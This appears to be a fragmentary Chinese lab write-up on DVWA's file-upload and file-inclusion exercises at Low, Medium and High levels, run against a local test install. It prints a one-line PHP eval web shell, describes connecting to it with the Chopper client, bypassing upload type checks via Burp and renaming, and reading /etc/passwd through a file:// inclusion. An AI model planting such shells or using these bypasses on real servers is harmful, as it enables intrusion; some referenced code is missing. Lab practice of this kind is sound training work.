Low
沒有進行任何過濾
首相,上傳一個phpinfo.php,其內代碼如下:
上傳路徑:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然後訪問
首先,寫好
說明存在上傳和執行漏洞
上傳一句話木馬:
<?php @eval($_POST[“hack”]); ?>保存爲hack.php
然後上傳
找到文件上傳目錄
http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php
可以直接用hackbar這個插件,上傳命令,爆出信息
使用菜刀連接
成功
Medium
有過濾
使用str_replace函數是極其不安全的,因爲可以使用雙寫繞過替換規則。
同時,因爲替換的只是“…/”、“…\”,所以對採用絕對路徑的方式包含文件是不會受到任何限制的。
可以先在上傳一個
此題要求,需要上傳 .png或 .jpeg格式文件
因此,我們想到可以更改文件類型,然後上傳
直接hack.php擴展名改爲hack.png,然後上傳,
可以上傳成功,
使用菜刀連接
連接不上
製作圖片碼上傳,同樣如此
那麼,可以使用burp抓包修改文件類型看看
成功
High
其過濾內容爲
這個if語句的意思是如果page中不含有file並且page不等於include.php服務器纔不會去包含相應的文件。兩個條件只要不滿足其中之一就可以,要麼page等於include.php,要麼page含有file。用file://流訪問本地文件系統
http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd
說明存在命令執行
上菜刀,結果發現無聊是如何,jar版本的死活連不上,使用windows .exe版本的可以,我也懵逼